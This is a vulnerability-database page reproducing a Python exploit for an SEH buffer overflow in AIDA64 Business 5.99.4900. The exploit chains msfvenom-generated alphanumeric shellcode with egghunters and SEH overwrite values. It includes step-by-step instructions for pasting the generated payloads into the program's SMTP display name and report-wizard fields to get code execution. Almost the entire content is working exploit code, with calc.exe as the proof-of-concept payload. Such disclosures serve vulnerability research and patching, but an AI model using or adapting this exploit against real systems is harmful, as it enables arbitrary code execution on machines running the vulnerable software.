Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormPeyman ForouzanPACKETSTORM:152365
HistoryApr 03, 2019 - 12:00 a.m.

AIDA64 Business 5.99.4900 SEH Buffer Overflow

2019-04-0300:00:00
Peyman Forouzan
packetstormsecurity.com
22
JSON
`#!/usr/bin/python #  
# Exploit Title: AIDA64 Business 5.99.4900 - SEH Buffer Overflow (EggHunter) #  
# Date: 2019-04-01 #  
# Vendor Homepage: https://www.aida64.com #  
# Software Link: https://www.aida64.com/downloads #  
# Mirror Link : https://www.softpedia.com/get/System/System-Info/AIDA64-Business-Edition.shtml #  
# Exploit Author: Peyman Forouzan #  
# Tested Version: 5.99.4900 #  
# Tested on: Winxp SP2 32-64 bit - Win7 Enterprise SP1 32-64 bit - Win10 Enterprise 32-64 bit #  
# Special Thanks to my wife #  
# The program has SEH Buffer Overflow in several places.(this code show one of them) #  
# Note 1 : To optimize code, I've used a "stack pivot" that is the same in #  
# (Extreme, Engineer, Network Audit) Editions. #  
# So this code works in (Extreme, Engineer, Network Audit) of version 5.99.4900 #  
# But the stack pivots in Business Edition are different. #  
# Note 2 : All the old versions of the program that are available on the sites like soft32.com, #  
# or in https://www.aida64.com/downloads/archive #  
# have the same vulnerabily in different offsets (for example version 5.70.3800 ) #  
# Note 3 : this technique (EggHunter) has been used to run vulnerability in different windows versions. #  
# Steps : #  
# 1- Run python code : Aida64-Business.py ( Three files are created ) #  
# 2- App --> File --> Preferences --> Email --> SMTP --> paste in contents from the egg.txt #  
# into "Display name" --> Ok #  
# 3- Report --> Report Wizard ... --> Next --> paste in contents from the egghunter-winxp-win7.txt #  
# or egghunter-win10.txt (depend on your windows version) into "Load from file" --> Next #  
# --> Wait a minute --> Shellcode (Calc) open #  
#---------------------------------------------------------------------------------------------------------#  
  
#------------------------------------ EGG Shellcode Generation ---------------------------------------  
  
bufsize = 292  
  
#msfvenom -p windows/exec cmd=calc.exe BufferRegister=EDI -e x86/alpha_mixed -f python -a x86 --platform windows -v egg  
egg = "w00tw00t"  
egg += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"  
egg += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30"  
egg += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"  
egg += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"  
egg += "\x79\x6c\x5a\x48\x4e\x62\x77\x70\x57\x70\x63\x30\x71"  
egg += "\x70\x4b\x39\x5a\x45\x35\x61\x4f\x30\x52\x44\x4c\x4b"  
egg += "\x52\x70\x46\x50\x6c\x4b\x53\x62\x54\x4c\x6c\x4b\x43"  
egg += "\x62\x44\x54\x6c\x4b\x71\x62\x51\x38\x34\x4f\x6e\x57"  
egg += "\x31\x5a\x36\x46\x55\x61\x6b\x4f\x4c\x6c\x37\x4c\x75"  
egg += "\x31\x73\x4c\x45\x52\x54\x6c\x77\x50\x49\x51\x48\x4f"  
egg += "\x34\x4d\x53\x31\x69\x57\x39\x72\x4a\x52\x62\x72\x43"  
egg += "\x67\x6e\x6b\x71\x42\x52\x30\x4c\x4b\x70\x4a\x47\x4c"  
egg += "\x6e\x6b\x62\x6c\x62\x31\x72\x58\x6a\x43\x70\x48\x33"  
egg += "\x31\x4e\x31\x52\x71\x4c\x4b\x36\x39\x37\x50\x63\x31"  
egg += "\x5a\x73\x4c\x4b\x42\x69\x52\x38\x68\x63\x57\x4a\x31"  
egg += "\x59\x4e\x6b\x44\x74\x4c\x4b\x55\x51\x38\x56\x50\x31"  
egg += "\x6b\x4f\x6e\x4c\x69\x51\x78\x4f\x46\x6d\x36\x61\x58"  
egg += "\x47\x46\x58\x4b\x50\x52\x55\x39\x66\x65\x53\x71\x6d"  
egg += "\x79\x68\x45\x6b\x31\x6d\x45\x74\x34\x35\x7a\x44\x52"  
egg += "\x78\x4c\x4b\x62\x78\x77\x54\x47\x71\x58\x53\x75\x36"  
egg += "\x6c\x4b\x34\x4c\x70\x4b\x6c\x4b\x52\x78\x35\x4c\x43"  
egg += "\x31\x58\x53\x6c\x4b\x73\x34\x6e\x6b\x67\x71\x58\x50"  
egg += "\x6c\x49\x73\x74\x45\x74\x55\x74\x63\x6b\x61\x4b\x33"  
egg += "\x51\x32\x79\x51\x4a\x36\x31\x49\x6f\x4b\x50\x71\x4f"  
egg += "\x71\x4f\x42\x7a\x6c\x4b\x44\x52\x48\x6b\x6e\x6d\x31"  
egg += "\x4d\x50\x6a\x35\x51\x6e\x6d\x6f\x75\x48\x32\x55\x50"  
egg += "\x75\x50\x53\x30\x46\x30\x55\x38\x74\x71\x4c\x4b\x72"  
egg += "\x4f\x4e\x67\x69\x6f\x6b\x65\x4d\x6b\x5a\x50\x38\x35"  
egg += "\x79\x32\x56\x36\x45\x38\x59\x36\x6a\x35\x6f\x4d\x6f"  
egg += "\x6d\x69\x6f\x59\x45\x35\x6c\x64\x46\x31\x6c\x76\x6a"  
egg += "\x4b\x30\x79\x6b\x4b\x50\x74\x35\x73\x35\x4d\x6b\x73"  
egg += "\x77\x65\x43\x71\x62\x32\x4f\x50\x6a\x75\x50\x31\x43"  
egg += "\x39\x6f\x5a\x75\x55\x33\x43\x51\x72\x4c\x45\x33\x44"  
egg += "\x6e\x62\x45\x31\x68\x62\x45\x63\x30\x41\x41"  
  
f = open ("egg.txt", "w")  
f.write(egg)  
f.close()  
  
#---------------------------------- EGG Hunter Shellcode Generation ------------------------------------  
egghunter = "\x8b\x7c\x24\x08\xbe\xe9\xfe\xff\xff\xf7\xde\x29\xf7"  
egghunter += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"  
egghunter += "\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58"  
egghunter += "\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42"  
egghunter += "\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41"  
egghunter += "\x42\x75\x4a\x49\x70\x66\x4c\x4c\x78\x4b\x6b\x30"  
egghunter += "\x49\x6b\x54\x63\x42\x55\x74\x4a\x66\x51\x69\x4b"  
egghunter += "\x36\x51\x38\x52\x36\x33\x52\x73\x36\x33\x36\x33"  
egghunter += "\x38\x33\x4f\x30\x71\x76\x4d\x51\x6b\x7a\x39\x6f"  
egghunter += "\x66\x6f\x47\x32\x36\x32\x4d\x50\x59\x6b\x59\x50"  
egghunter += "\x33\x44\x57\x78\x43\x5a\x66\x62\x72\x78\x78\x4d"  
egghunter += "\x44\x6e\x73\x6a\x7a\x4b\x37\x62\x52\x4a\x71\x36"  
egghunter += "\x61\x48\x55\x61\x69\x59\x6f\x79\x79\x72\x70\x64"  
egghunter += "\x59\x6f\x75\x43\x73\x6a\x6e\x63\x57\x4c\x71\x34"  
egghunter += "\x47\x70\x42\x54\x76\x61\x72\x7a\x57\x4c\x37\x75"  
egghunter += "\x74\x34\x7a\x76\x6c\x78\x72\x57\x46\x50\x76\x50"  
egghunter += "\x63\x44\x6d\x59\x59\x47\x4e\x4f\x71\x65\x4e\x31"  
egghunter += "\x6e\x4f\x51\x65\x38\x4e\x79\x6f\x4b\x57\x41\x41"  
  
egghunter10 = "\x8b\x7c\x24\x08\xbe\xe9\xfe\xff\xff\xf7\xde\x29"  
egghunter10 += "\xf7\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49"  
egghunter10 += "\x49\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41"  
egghunter10 += "\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41"  
egghunter10 += "\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38"  
egghunter10 += "\x41\x42\x75\x4a\x49\x4d\x53\x5a\x4c\x34\x70\x50"  
egghunter10 += "\x31\x69\x42\x30\x52\x70\x52\x30\x52\x62\x46\x4e"  
egghunter10 += "\x6c\x4a\x6b\x6b\x30\x59\x6b\x76\x43\x44\x35\x54"  
egghunter10 += "\x42\x4d\x63\x59\x50\x30\x66\x4b\x31\x59\x5a\x69"  
egghunter10 += "\x6f\x56\x6f\x43\x72\x31\x42\x6b\x30\x39\x6b\x6f"  
egghunter10 += "\x30\x44\x34\x44\x4c\x48\x38\x64\x7a\x39\x6e\x39"  
egghunter10 += "\x6f\x49\x6f\x6c\x37\x4b\x68\x68\x4d\x64\x6e\x72"  
egghunter10 += "\x7a\x58\x6b\x47\x61\x54\x71\x4b\x6b\x76\x33\x31"  
egghunter10 += "\x43\x76\x33\x50\x6a\x45\x79\x46\x38\x78\x33\x39"  
egghunter10 += "\x50\x45\x34\x49\x6f\x46\x73\x4f\x73\x4b\x74\x66"  
egghunter10 += "\x6c\x72\x7a\x65\x6c\x46\x65\x54\x34\x5a\x73\x78"  
egghunter10 += "\x38\x51\x67\x34\x70\x30\x30\x30\x74\x4b\x39\x78"  
egghunter10 += "\x57\x6e\x4f\x42\x55\x48\x4e\x4e\x4f\x74\x35\x5a"  
egghunter10 += "\x6b\x69\x6f\x4b\x57\x41\x41"  
  
jmpback = "\xe9\xdc\xfe\xff\xff" # jmp back  
nseh = "\xeb\xf9\x90\x90" # jmp Short back  
seh = "\x50\x15\x40" # Overwrite Seh - Golden Pivot !! - Works on all Editions  
  
buffer = egghunter  
buffer += "\x41" * (bufsize-len(buffer)-len(jmpback))  
buffer += jmpback  
buffer += nseh  
buffer += seh  
print "[+] Creating %s bytes payload for winxp and windows 7 ..." %len(buffer)  
f = open ("egghunter-winxp-win7.txt", "w")  
print "[+] File created!"  
f.write(buffer)  
f.close()  
  
buffer = egghunter10  
buffer += "\x41" * (bufsize-len(buffer)-len(jmpback))  
buffer += jmpback  
buffer += nseh  
buffer += seh  
print "[+] Creating %s bytes payload for windows 10 ..." %len(buffer)  
f = open ("egghunter-win10.txt", "w")  
print "[+] File created!"  
f.write(buffer)  
f.close()  
`
JSON